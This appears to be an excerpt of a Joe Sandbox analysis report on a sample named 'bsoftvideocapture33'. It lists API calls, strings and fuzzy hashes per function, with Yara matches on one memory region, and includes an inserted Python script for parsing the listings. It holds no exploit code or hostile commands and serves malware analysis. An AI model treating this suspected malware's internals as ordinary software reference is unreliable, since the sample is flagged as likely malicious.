                                                                                                                                        Similarity
                                                                                                                                        • API ID: HeapValue$FreeProcess
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1812714009-0
                                                                                                                                        • Opcode ID: 792396838af685bd7528fc474f441e06df8b10408167c42e4090c4ff5754b56a
                                                                                                                                        • Instruction ID: 8ee604030f26bfe20c1b3eec454bc0a72ecac34c265262a85509bdc8ad89019f
                                                                                                                                        • Opcode Fuzzy Hash: 792396838af685bd7528fc474f441e06df8b10408167c42e4090c4ff5754b56a
                                                                                                                                        • Instruction Fuzzy Hash: 4351D131A043849FD720CF29C845B16BBE4EB867A4F098659E91DAB380D775ED04DFD1
                                                                                                                                        APIs
                                                                                                                                        • _ValidateScopeTableHandlers.LIBCMT ref: 02C22DB0
                                                                                                                                        • __FindPESection.LIBCMT ref: 02C22DCA
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2503983585.0000000002C01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C01000, based on PE: false
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_2c01000_bsoftvideocapture33.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FindHandlersScopeSectionTableValidate
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 876702719-0
                                                                                                                                        • Opcode ID: 14683eb906623d19fdf31907a899f192c56ff9f379bcb1c2c7f911b417ebaa28
                                                                                                                                        • Instruction ID: 4edaf070178d30287bfb71ee5a8eccc6f36422424fa712b0a97ad3c07fb03f7a
                                                                                                                                        • Opcode Fuzzy Hash: 14683eb906623d19fdf31907a899f192c56ff9f379bcb1c2c7f911b417ebaa28
                                                                                                                                        • Instruction Fuzzy Hash: 04A1B171A006258FDB15CF18DC80BADB7A5FB88364F584669DC15E7350EB31ED09CB92
                                                                                                                                        APIs
                                                                                                                                        • GetStringTypeW.KERNEL32(00000001,00408640,00000001,00000000,00000103,00000001,00000000,00405E87,00200020,00000000,?,00000000,00000000,00000001), ref: 004062BD
                                                                                                                                        • GetStringTypeA.KERNEL32(00000000,00000001,0040863C,00000001,?,?,00000000,00000000,00000001), ref: 004062D7
                                                                                                                                        • GetStringTypeA.KERNEL32(00000000,00000000,?,00000000,00200020,00000103,00000001,00000000,00405E87,00200020,00000000,?,00000000,00000000,00000001), ref: 0040630B
                                                                                                                                        • MultiByteToWideChar.KERNEL32(00405E87,00000002,?,00000000,00000000,00000000,00000103,00000001,00000000,00405E87,00200020,00000000,?,00000000,00000000,00000001), ref: 00406343
                                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00406399
                                                                                                                                        • GetStringTypeW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004063AB
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2500138787.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2500138787.000000000040B000.00000040.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_400000_bsoftvideocapture33.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: StringType$ByteCharMultiWide
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3852931651-0
                                                                                                                                        • Opcode ID: cf2b00ed6b196f36b683551b44420558e4c124c4ce81df5fbf361f916f1db976
                                                                                                                                        • Instruction ID: c24f9c314fd5361508d9a81ca748d23a743e3bd76f11a01e88467cad10db7353
                                                                                                                                        • Opcode Fuzzy Hash: cf2b00ed6b196f36b683551b44420558e4c124c4ce81df5fbf361f916f1db976
                                                                                                                                        • Instruction Fuzzy Hash: A7418072500219EFDF119F94DE85AAF3F78EB04310F11453AFA52F6290C73989608BA8
                                                                                                                                        APIs
                                                                                                                                        • sqlite3_free.SQLITE3(?), ref: 609476DD
                                                                                                                                          • Part of subcall function 60904423: sqlite3_mutex_leave.SQLITE3(6090449D,?,?,?,60908270), ref: 60904446
                                                                                                                                        • sqlite3_log.SQLITE3 ref: 609498F5
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2505217077.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2505197788.0000000060900000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505340838.000000006096E000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505362395.000000006096F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505390337.000000006097B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505411421.000000006097D000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2505430143.0000000060980000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_60900000_bsoftvideocapture33.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: sqlite3_freesqlite3_logsqlite3_mutex_leave
                                                                                                                                        • String ID: List of tree roots: $d$|
                                                                                                                                        • API String ID: 3709608969-1164703836
                                                                                                                                        • Opcode ID: 316fa83f4dc1e403b3b617744d66ff6f9af545e53e2752a9ff9486d467efffaf
                                                                                                                                        • Instruction ID: c91562837ba2d96ae21b52ab8334c840e7cbe23d8154f1acff92b465618a0bd4
                                                                                                                                        • Opcode Fuzzy Hash: 316fa83f4dc1e403b3b617744d66ff6f9af545e53e2752a9ff9486d467efffaf
                                                                                                                                        • Instruction Fuzzy Hash: 3FE10570A043698BDB22CF18C88179DFBBABF65304F1185D9E858AB251D775DE81CF81
                                                                                                                                        APIs
                                                                                                                                        • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 02C01CB1
                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 02C01CBA
• InterlockedExchangeAdd.KERNEL32(02C35264,00000000), ref: 02C01CC6
• TerminateThread.KERNEL32(?,00000000), ref: 02C01CD4
• QueueUserAPC.KERNEL32(02C01E7C,?,00000000), ref: 02C01CE1
• WaitForSingleObject.KERNEL32(?,000000FF), ref: 02C01CEC
Memory Dump Source
• Source File: 00000006.00000002.2503983585.0000000002C01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C01000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_2c01000_bsoftvideocapture33.jbxd
Yara matches
Similarity
• API ID: Wait$CloseExchangeHandleInterlockedMultipleObjectObjectsQueueSingleTerminateThreadUser
• String ID:
• API String ID: 1946104331-0
• Opcode ID: 0e9602b5e63db14f359ae297ead5015130c3ffd1aee7cedbd20e09d86ebcd070
• Instruction ID: 07c988c4090f7202e87e3e7216e27dd6d2be75789580d891f361c3bb88e24550
• Opcode Fuzzy Hash: 0e9602b5e63db14f359ae297ead5015130c3ffd1aee7cedbd20e09d86ebcd070
• Instruction Fuzzy Hash: B2F08135960210AFD7245B96DC0DE5BBBBCEB85B617414719F52A82190DFB09814CBE0
APIs
  • Part of subcall function 6095FFB2: sqlite3_bind_int64.SQLITE3 ref: 6095FFFA
  • Part of subcall function 6095FFB2: sqlite3_step.SQLITE3 ref: 60960009
  • Part of subcall function 6095FFB2: sqlite3_reset.SQLITE3 ref: 60960019
  • Part of subcall function 6095FFB2: sqlite3_result_error_code.SQLITE3 ref: 60960043
• sqlite3_column_int64.SQLITE3 ref: 609600BA
• sqlite3_column_text.SQLITE3 ref: 609600EF
• sqlite3_free.SQLITE3 ref: 6096029A
Strings
Memory Dump Source
• Source File: 00000006.00000002.2505217077.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
• Associated: 00000006.00000002.2505197788.0000000060900000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000006.00000002.2505340838.000000006096E000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 00000006.00000002.2505362395.000000006096F000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000006.00000002.2505390337.000000006097B000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000006.00000002.2505411421.000000006097D000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000006.00000002.2505430143.0000000060980000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_60900000_bsoftvideocapture33.jbxd
Similarity
• API ID: sqlite3_bind_int64sqlite3_column_int64sqlite3_column_textsqlite3_freesqlite3_resetsqlite3_result_error_codesqlite3_step
• String ID: e
• API String ID: 786425071-4024072794
• Opcode ID: 373422d03c3c71c2ddc35291c61dfb2213fd8f263c0b9a30c36f02d650250dc2
• Instruction ID: e80500568aa73e744b5c90812a7938b6c4ac38b40afb48beb036dafaf3e7d002
• Opcode Fuzzy Hash: 373422d03c3c71c2ddc35291c61dfb2213fd8f263c0b9a30c36f02d650250dc2
• Instruction Fuzzy Hash: 6291E270A18609CFDB04CF99C494B9EBBF2BF98314F108529E869AB354D774E885CF91
APIs
• GetVersionExA.KERNEL32 ref: 00403A3B
• GetEnvironmentVariableA.KERNEL32(__MSVCRT_HEAP_SELECT,?,00001090), ref: 00403A70
• GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00403AD0
Strings
Memory Dump Source
• Source File: 00000006.00000002.2500138787.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.2500138787.000000000040B000.00000040.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_400000_bsoftvideocapture33.jbxd
Similarity
• API ID: EnvironmentFileModuleNameVariableVersion
• String ID: __GLOBAL_HEAP_SELECTED$__MSVCRT_HEAP_SELECT
• API String ID: 1385375860-4131005785
• Opcode ID: 0f37da7df256ea2bf10cd5595ffbc211f3aae08b662fce8f1d53329a7b1a0cb3
• Instruction ID: 8e0d8efe135bd9bd4ab90b631ae35de0fa5087430b450c3f58eab12f6465c816
• Opcode Fuzzy Hash: 0f37da7df256ea2bf10cd5595ffbc211f3aae08b662fce8f1d53329a7b1a0cb3
• Instruction Fuzzy Hash: BD3102319012886DEB319A745C46B9B7F6C9B02309F2404FBE185F52C3E6389F89CB1D
APIs
Strings
Memory Dump Source
• Source File: 00000006.00000002.2505217077.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
• Associated: 00000006.00000002.2505197788.0000000060900000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000006.00000002.2505340838.000000006096E000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 00000006.00000002.2505362395.000000006096F000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000006.00000002.2505390337.000000006097B000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000006.00000002.2505411421.000000006097D000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000006.00000002.2505430143.0000000060980000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_60900000_bsoftvideocapture33.jbxd
Similarity
• API ID: sqlite3_exec
• String ID: sqlite_master$sqlite_temp_master$|
• API String ID: 2141490097-2247242311
• Opcode ID: 0e32379bf9c90bcee3e658b343db186d73978ee403121efd96d42beb4ff38922
• Instruction ID: 9143400cfb6dc20a8edc2ca7c04099347fc9d468871a1d2187ae3123f936d49a
• Opcode Fuzzy Hash: 0e32379bf9c90bcee3e658b343db186d73978ee403121efd96d42beb4ff38922
• Instruction Fuzzy Hash: C551B6B09083289BDB26CF18C885799BBFABF59304F108599E498A7351D775DA84CF41
APIs
• std::exception::exception.LIBCMT ref: 02C1098F
  • Part of subcall function 02C114E3: std::exception::_Copy_str.LIBCMT ref: 02C114FC
  • Part of subcall function 02C0FD60: __CxxThrowException@8.LIBCMT ref: 02C0FDBE
• std::exception::exception.LIBCMT ref: 02C109EE
Strings
• boost unique_lock has no mutex, xrefs: 02C1097E
• boost unique_lock owns already the mutex, xrefs: 02C109DD
• $, xrefs: 02C109F3
Memory Dump Source
• Source File: 00000006.00000002.2503983585.0000000002C01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C01000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_2c01000_bsoftvideocapture33.jbxd
Yara matches
Similarity
• API ID: std::exception::exception$Copy_strException@8Throwstd::exception::_
• String ID: $$boost unique_lock has no mutex$boost unique_lock owns already the mutex
• API String ID: 2140441600-46888669
• Opcode ID: ddf743e13114be73263cb85da90c10d85f33fd340937aff051017dccbafba0a9
• Instruction ID: 2b2c43c7befc1822c14a143cb0bab4f47e239ef6a498c6844e8fc2da705305d4
• Opcode Fuzzy Hash: ddf743e13114be73263cb85da90c10d85f33fd340937aff051017dccbafba0a9
• Instruction Fuzzy Hash: DC2168B14083909FD320DF24C55574BBBE9BB89B08F004E1DF49587280CBB99448DF92
APIs
• __getptd_noexit.LIBCMT ref: 02C136F0
  • Part of subcall function 02C148E2: GetLastError.KERNEL32(771B0A60,771AF550,02C14AD0,02C12043,771AF550,?,02C05A0D,00000104,771B0A60,771AF550,ntdll.dll,?,?,?,02C05EE9), ref: 02C148E4
  • Part of subcall function 02C148E2: __calloc_crt.LIBCMT ref: 02C14905
  • Part of subcall function 02C148E2: __initptd.LIBCMT ref: 02C14927
  • Part of subcall function 02C148E2: GetCurrentThreadId.KERNEL32 ref: 02C1492E
  • Part of subcall function 02C148E2: SetLastError.KERNEL32(00000000,02C05A0D,00000104,771B0A60,771AF550,ntdll.dll,?,?,?,02C05EE9), ref: 02C14946
• __calloc_crt.LIBCMT ref: 02C13713
• __get_sys_err_msg.LIBCMT ref: 02C13731
• __invoke_watson.LIBCMT ref: 02C1374E
Strings
• Visual C++ CRT: Not enough memory to complete call to strerror., xrefs: 02C136FB, 02C13721
Memory Dump Source
• Source File: 00000006.00000002.2503983585.0000000002C01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C01000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_2c01000_bsoftvideocapture33.jbxd
Yara matches
Similarity
• API ID: ErrorLast__calloc_crt$CurrentThread__get_sys_err_msg__getptd_noexit__initptd__invoke_watson
• String ID: Visual C++ CRT: Not enough memory to complete call to strerror.
• API String ID: 109275364-798102604
• Opcode ID: d7261d88ab9b9f4c33688d93c1a66c5bdc7e9ab247eb4cfe8294f0f0abe4368c
• Instruction ID: 2d3fa565ab961aee8f259c842a2234cebcb9f3bc47b5d4d5debfe7023b2e7246
• Opcode Fuzzy Hash: d7261d88ab9b9f4c33688d93c1a66c5bdc7e9ab247eb4cfe8294f0f0abe4368c
• Instruction Fuzzy Hash: 35F024B29046907AA721352A9D43A3B728DDF876F8B0000A6FA4497200EF51DD0076E8
APIs
• InterlockedExchange.KERNEL32(?,00000001), ref: 02C02350
• InterlockedExchange.KERNEL32(?,00000001), ref: 02C02360
• PostQueuedCompletionStatus.KERNEL32(00000000,00000000,00000000,00000000), ref: 02C02370
• GetLastError.KERNEL32 ref: 02C0237A
  • Part of subcall function 02C01712: __EH_prolog.LIBCMT ref: 02C01717
Strings
Memory Dump Source
• Source File: 00000006.00000002.2503983585.0000000002C01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C01000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_2c01000_bsoftvideocapture33.jbxd
Yara matches
Similarity
• API ID: ExchangeInterlocked$CompletionErrorH_prologLastPostQueuedStatus
• String ID: pqcs
• API String ID: 1619523792-2559862021
• Opcode ID: ee443cc14f6f5103ed49d17eda71eab9d7fc80b865e73eaf21087db8c4c7c550
• Instruction ID: 28180fc8966b350d19d8b512d9284ebdac7bdbca67571318a1be4c8569306dc7
• Opcode Fuzzy Hash: ee443cc14f6f5103ed49d17eda71eab9d7fc80b865e73eaf21087db8c4c7c550
• Instruction Fuzzy Hash: 93F03071A40304AFDB30AFA49C4DFAB77ACEB45641B410669E909D6180EF7099589BD1
APIs
• __EH_prolog.LIBCMT ref: 02C04035
• GetProcessHeap.KERNEL32(00000000,?), ref: 02C04042
• RtlAllocateHeap.NTDLL(00000000), ref: 02C04049
• std::exception::exception.LIBCMT ref: 02C04063
  • Part of subcall function 02C096CF: __EH_prolog.LIBCMT ref: 02C096D4
  • Part of subcall function 02C096CF: Concurrency::cancellation_token::_FromImpl.LIBCPMT ref: 02C096E3
  • Part of subcall function 02C096CF: __CxxThrowException@8.LIBCMT ref: 02C09702
Strings
Memory Dump Source
• Source File: 00000006.00000002.2503983585.0000000002C01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C01000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_2c01000_bsoftvideocapture33.jbxd
Yara matches
Similarity
• API ID: H_prologHeap$AllocateConcurrency::cancellation_token::_Exception@8FromImplProcessThrowstd::exception::exception
• String ID: bad allocation
• API String ID: 3112922283-2104205924
• Opcode ID: 0fc61dc50780aea6f70e0c7d1cb2263c3cfea1e3f18edc5ceb080bdedc143c01
• Instruction ID: 66cd728eec7c3a56b06d50f804139042bf5f4510867d3200a111e67c771c79e5
• Opcode Fuzzy Hash: 0fc61dc50780aea6f70e0c7d1cb2263c3cfea1e3f18edc5ceb080bdedc143c01
• Instruction Fuzzy Hash: 00F058B1E40259EBDB10AFE0C948BAFBB79EB04305F004948EA16A2181DB79821C9B91

APIs
  • Part of subcall function 6090A0D5: sqlite3_free.SQLITE3 ref: 6090A118
• sqlite3_malloc.SQLITE3 ref: 6094B1D1
• sqlite3_value_bytes.SQLITE3 ref: 6094B24C
• sqlite3_malloc.SQLITE3 ref: 6094B272
• sqlite3_value_blob.SQLITE3 ref: 6094B298
• sqlite3_free.SQLITE3 ref: 6094B2C8
  • Part of subcall function 6094A894: sqlite3_bind_int64.SQLITE3 ref: 6094A8C0
  • Part of subcall function 6094A894: sqlite3_step.SQLITE3 ref: 6094A8CE
  • Part of subcall function 6094A894: sqlite3_column_int64.SQLITE3 ref: 6094A8E9
  • Part of subcall function 6094A894: sqlite3_reset.SQLITE3 ref: 6094A90F
Memory Dump Source
• Source File: 00000006.00000002.2505217077.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
• Associated: 00000006.00000002.2505197788.0000000060900000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000006.00000002.2505340838.000000006096E000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 00000006.00000002.2505362395.000000006096F000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000006.00000002.2505390337.000000006097B000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000006.00000002.2505411421.000000006097D000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000006.00000002.2505430143.0000000060980000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_60900000_bsoftvideocapture33.jbxd
Similarity
• API ID: sqlite3_freesqlite3_malloc$sqlite3_bind_int64sqlite3_column_int64sqlite3_resetsqlite3_stepsqlite3_value_blobsqlite3_value_bytes
• String ID:
• API String ID: 683514883-0
• Opcode ID: 3036fcfce1ee653ed62d56f61367963e4d2afc4bfe1ca560103df060be3b8356
• Instruction ID: 83940ce9cf0a2bab7a741171fc95cc3a005d2848f59039768723a80715f2adcb
• Opcode Fuzzy Hash: 3036fcfce1ee653ed62d56f61367963e4d2afc4bfe1ca560103df060be3b8356
• Instruction Fuzzy Hash: E19133B1A052099FCB04CFA9D490B9EBBF6FF68314F108569E855AB341DB34ED81CB91

APIs
• sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,?,?,6093A8DF), ref: 6093A200
• sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,?,?,6093A8DF), ref: 6093A391
• sqlite3_mutex_free.SQLITE3(?,?,?,?,?,?,?,?,6093A8DF), ref: 6093A3A3
• sqlite3_free.SQLITE3 ref: 6093A3BA
• sqlite3_free.SQLITE3 ref: 6093A3C2
  • Part of subcall function 6093A0C5: sqlite3_mutex_enter.SQLITE3 ref: 6093A114
  • Part of subcall function 6093A0C5: sqlite3_mutex_free.SQLITE3 ref: 6093A152
  • Part of subcall function 6093A0C5: sqlite3_mutex_leave.SQLITE3 ref: 6093A162
  • Part of subcall function 6093A0C5: sqlite3_free.SQLITE3 ref: 6093A1A4
  • Part of subcall function 6093A0C5: sqlite3_free.SQLITE3 ref: 6093A1C3
Memory Dump Source
• Source File: 00000006.00000002.2505217077.0000000060901000.00000020.00000001.01000000.0000000B.sdmp, Offset: 60900000, based on PE: true
• Associated: 00000006.00000002.2505197788.0000000060900000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000006.00000002.2505340838.000000006096E000.00000008.00000001.01000000.0000000B.sdmp
• Associated: 00000006.00000002.2505362395.000000006096F000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000006.00000002.2505390337.000000006097B000.00000002.00000001.01000000.0000000B.sdmp
• Associated: 00000006.00000002.2505411421.000000006097D000.00000004.00000001.01000000.0000000B.sdmp
• Associated: 00000006.00000002.2505430143.0000000060980000.00000002.00000001.01000000.0000000B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_60900000_bsoftvideocapture33.jbxd
Similarity
• API ID: sqlite3_free$sqlite3_mutex_leave$sqlite3_mutex_free$sqlite3_mutex_enter
• String ID:
• API String ID: 1903298374-0
• Opcode ID: 8530df85f137a660efabd51ca86f4821d2fdcc6d7a3fd2cfb4f5547b241dda56
• Instruction ID: f6c450fbbadf2e04ab128defb7df19fdb2a161b4e6cf4e71623f80625393026f
• Opcode Fuzzy Hash: 8530df85f137a660efabd51ca86f4821d2fdcc6d7a3fd2cfb4f5547b241dda56
• Instruction Fuzzy Hash: EB513870A047218BDB58DF69C8C074AB7A6BF65318F05896CECA69B305D735EC41CF91

APIs
• GetStartupInfoA.KERNEL32(?), ref: 0040389D
• GetFileType.KERNEL32(00000800), ref: 00403943
• GetStdHandle.KERNEL32(-000000F6), ref: 0040399C
• GetFileType.KERNEL32(00000000), ref: 004039AA
• SetHandleCount.KERNEL32 ref: 004039E1
Memory Dump Source
• Source File: 00000006.00000002.2500138787.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.2500138787.000000000040B000.00000040.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_400000_bsoftvideocapture33.jbxd
Similarity
• API ID: FileHandleType$CountInfoStartup
• String ID:
• API String ID: 1710529072-0
• Opcode ID: 8d0a60c3e4ac118d2a900155c67ad164fc617dcd942d9939c19efbd45a80342d
• Instruction ID: f62a53ccb3921abde3b71b62465be81688a6b50f354c2269ba15f2c38ec8df3a
• Opcode Fuzzy Hash: 8d0a60c3e4ac118d2a900155c67ad164fc617dcd942d9939c19efbd45a80342d
• Instruction Fuzzy Hash: 395148B25146408BC7208F29C9887267F98BB02326F05873AE496FB3E1D7B8DA05C709

APIs
  • Part of subcall function 02C10A60: CloseHandle.KERNEL32(00000000,4213E8DE), ref: 02C10AB1
  • Part of subcall function 02C10A60: WaitForSingleObject.KERNEL32(?,000000FF,4213E8DE,?,?,?,?,4213E8DE,02C10A33,4213E8DE), ref: 02C10AC8
• ReleaseSemaphore.KERNEL32(?,?,00000000), ref: 02C10D2E
• ReleaseSemaphore.KERNEL32(?,?,00000000), ref: 02C10D4E
• CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 02C10D87
• CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?), ref: 02C10DDB
• SetEvent.KERNEL32(?), ref: 02C10DE2
  • Part of subcall function 02C0418C: CloseHandle.KERNEL32(00000000,?,02C10D15), ref: 02C041B0
Memory Dump Source
• Source File: 00000006.00000002.2503983585.0000000002C01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C01000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_2c01000_bsoftvideocapture33.jbxd
Yara matches
Similarity
• API ID: CloseHandle$ReleaseSemaphore$EventObjectSingleWait
• String ID:
• API String ID: 4166353394-0
• Opcode ID: c22c0356bfb9c78d87e03c81a59af229c2b2b920297572e246dc9091b5135221
• Instruction ID: e2011ff76354c6508edf9f790fee6503e18632a430261e4966cd35716ff5ef67
• Opcode Fuzzy Hash: c22c0356bfb9c78d87e03c81a59af229c2b2b920297572e246dc9091b5135221
• Instruction Fuzzy Hash: 9B4105316403118FDB25AF28CC81B1B77A4EF86724F140668EC18EB295D736E991DBD1
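The "APIs" listings in these entries follow one fixed line shape: a bullet, an optional "Part of subcall function ADDR:" prefix for calls the function inherits from a callee, then API.MODULE, an optional argument list ("?" for an argument the analysis could not resolve), and the call-site address after "ref:". With tens of thousands of such lines in a report, it helps to parse them rather than read them. The following is an added example, not Joe Sandbox code: it parses an entry into structured records and separates the function's own calls from the inherited subcall lines, which would otherwise inflate the picture of what one function does (the entry above lists CloseHandle four times, but only two of those calls are its own). The sample input is copied from the entry above; the record layout and function names are this example's own.

```python
"""Parse the per-function "APIs" listing of a Joe Sandbox function report.

Added example, not code from Joe Sandbox. The sample lines are copied from
the report on this page; the record layout (ApiCall) and the direct-vs-
subcall distinction are this example's own assumptions about the listing
format, not a documented Joe Sandbox interface.
"""
import re
from collections import Counter
from dataclasses import dataclass, field
from typing import List, Optional

# Constructed input: one entry's APIs listing, copied verbatim from the report.
SAMPLE_ENTRY = """\
• Part of subcall function 02C10A60: CloseHandle.KERNEL32(00000000,4213E8DE), ref: 02C10AB1
• Part of subcall function 02C10A60: WaitForSingleObject.KERNEL32(?,000000FF,4213E8DE,?,?,?,?,4213E8DE,02C10A33,4213E8DE), ref: 02C10AC8
• ReleaseSemaphore.KERNEL32(?,?,00000000), ref: 02C10D2E
• ReleaseSemaphore.KERNEL32(?,?,00000000), ref: 02C10D4E
• CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 02C10D87
• CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?), ref: 02C10DDB
• SetEvent.KERNEL32(?), ref: 02C10DE2
• Part of subcall function 02C0418C: CloseHandle.KERNEL32(00000000,?,02C10D15), ref: 02C041B0
"""

# Lines without an argument list ("sqlite3_free.SQLITE3 ref: 6093A3BA") also occur,
# so the parenthesised group is optional.
LINE_RE = re.compile(
    r"^\s*•\s*"
    r"(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[A-Za-z0-9_:@]+)\.(?P<mod>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?"
    r",?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)


@dataclass
class ApiCall:
    api: str
    module: str
    ref: int                                       # call-site address
    args: List[str] = field(default_factory=list)  # "?" = unresolved argument
    subcall_of: Optional[int] = None               # callee address when inherited


def parse_entry(text: str) -> List[ApiCall]:
    """Parse one entry's listing. A line that does not match raises, so a
    format change is noticed instead of silently dropping calls."""
    calls = []
    for line in text.splitlines():
        if not line.strip():
            continue
        m = LINE_RE.match(line)
        if not m:
            raise ValueError(f"unrecognised listing line: {line!r}")
        args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
        calls.append(ApiCall(
            api=m["api"],
            module=m["mod"],
            ref=int(m["ref"], 16),
            args=args,
            subcall_of=int(m["sub"], 16) if m["sub"] else None,
        ))
    return calls


def api_histogram(calls: List[ApiCall], include_subcalls: bool = False) -> Counter:
    """Count API names. By default only the function's own call sites count;
    subcall lines describe callees and are reported under their own entries."""
    return Counter(c.api for c in calls if include_subcalls or c.subcall_of is None)


def calls_by_module(calls: List[ApiCall], module: str) -> List[ApiCall]:
    """Filter calls by import module, case-insensitively (KERNEL32, SQLITE3, ...)."""
    return [c for c in calls if c.module.upper() == module.upper()]


if __name__ == "__main__":
    parsed = parse_entry(SAMPLE_ENTRY)
    print("direct:   ", dict(api_histogram(parsed)))
    print("with subs:", dict(api_histogram(parsed, include_subcalls=True)))
    for c in calls_by_module(parsed, "KERNEL32"):
        via = f"  [via {c.subcall_of:08X}]" if c.subcall_of is not None else ""
        print(f"{c.ref:08X} {c.api}({', '.join(c.args)}){via}")
```

Running it on the entry above gives two direct CloseHandle calls and four when subcall lines are included; the same split applies to the sqlite3 entries, where most of the mutex and free calls are inherited from 6093A0C5. Treat the "?" arguments as unknown rather than zero: the analysis could not resolve them, and the constant-looking values in the same position elsewhere are what the analyser did see on the stack.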

APIs
• InterlockedExchange.KERNEL32(?,00000001), ref: 02C020AC
• SetWaitableTimer.KERNEL32(00000000,?,00000001,00000000,00000000,00000000), ref: 02C020CD
• InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02C020D8
• InterlockedDecrement.KERNEL32(?), ref: 02C0213E
• InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 02C021A6
Memory Dump Source
• Source File: 00000006.00000002.2503983585.0000000002C01000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C01000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_2c01000_bsoftvideocapture33.jbxd
Yara matches
Similarity
• API ID: Interlocked$Exchange$DecrementTimerWaitable
• String ID:
• API String ID: 1611172436-0
• Opcode ID: d65889ccb2b6559ef41bc7178158de66d61122d3710eeb4a27dd702920ca0742
